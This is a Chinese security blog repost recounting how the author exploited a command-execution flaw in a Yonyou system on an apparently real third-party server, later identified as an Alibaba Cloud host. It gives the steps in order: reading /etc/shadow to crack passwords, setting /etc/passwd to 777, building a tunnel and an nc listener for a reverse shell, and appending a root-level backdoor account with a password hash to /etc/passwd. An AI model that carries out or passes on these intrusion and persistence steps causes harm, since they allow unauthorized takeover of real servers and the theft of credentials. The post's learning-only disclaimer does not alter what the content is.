记一次远程命令执行漏洞提权过程

admin 2023年5月3日11:49:45评论68 views字数 0阅读0分0秒阅读模式

记一次远程命令执行漏洞提权过程

正文

某站用友的命令执行漏洞,测试 print hello 发现可以执行命令
记一次远程命令执行漏洞提权过程
whami id查一波权限,发现是 root,权限这么大,很好搞啊
记一次远程命令执行漏洞提权过程
ps -ef | grep sshd 查一波发现可以ssh连接,直接 useradd 用户,但是整个 shell 无法给用户添加密码,无法远程登录,怎么搞,直接读 shadow 哈希,爆破密码
记一次远程命令执行漏洞提权过程
记一次远程命令执行漏洞提权过程
爆破无结果,头大,怎么搞,思考5分钟,可以直接写 passwd 啊,试一波
记一次远程命令执行漏洞提权过程
再次查看 shadow 居然没写进去,难道权限不对,ls -alrt /etc/passwd 发现权限是 544,直接 chmod 777 /etc/passwd 改权限,继续写,依然写不进去。
换了各种姿势,都不行,难住我了,突然想起了 nc 反弹,一般 linux 都装有 nc ,这个有没有,查一波
记一次远程命令执行漏洞提权过程
果然不错,有 nc ,通过 dnslog 查一下是否有外连
记一次远程命令执行漏洞提权过程
记一次远程命令执行漏洞提权过程

能 ping 通,果然能外连,那就可以通过 nc 反弹搞一波了,本地的攻击机在内网,内网穿透一波,我一般用 https://www.uulap.com/ 大家可以试试

将本地的 6666 端口映射到公网

记一次远程命令执行漏洞提权过程

本地建立监听 nc -l -n -v -p 6666

记一次远程命令执行漏洞提权过程
让目标机进行 nc 反弹
记一次远程命令执行漏洞提权过程
果然反弹回来了,直接上命令,加用户
echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash>> /etc/passwd
记一次远程命令执行漏洞提权过程
记一次远程命令执行漏洞提权过程
查看已经添加成功,直接ssh连接,发现是阿里云的服务器
记一次远程命令执行漏洞提权过程
至此结束,收工!

文章来源:潇湘信安

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

记一次远程命令执行漏洞提权过程

多一个点在看

记一次远程命令执行漏洞提权过程多一条小鱼干

原文始发于微信公众号(黑白之道):记一次远程命令执行漏洞提权过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月3日11:49:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次远程命令执行漏洞提权过程https://cn-sec.com/archives/1704368.html

发表评论

匿名网友 填写信息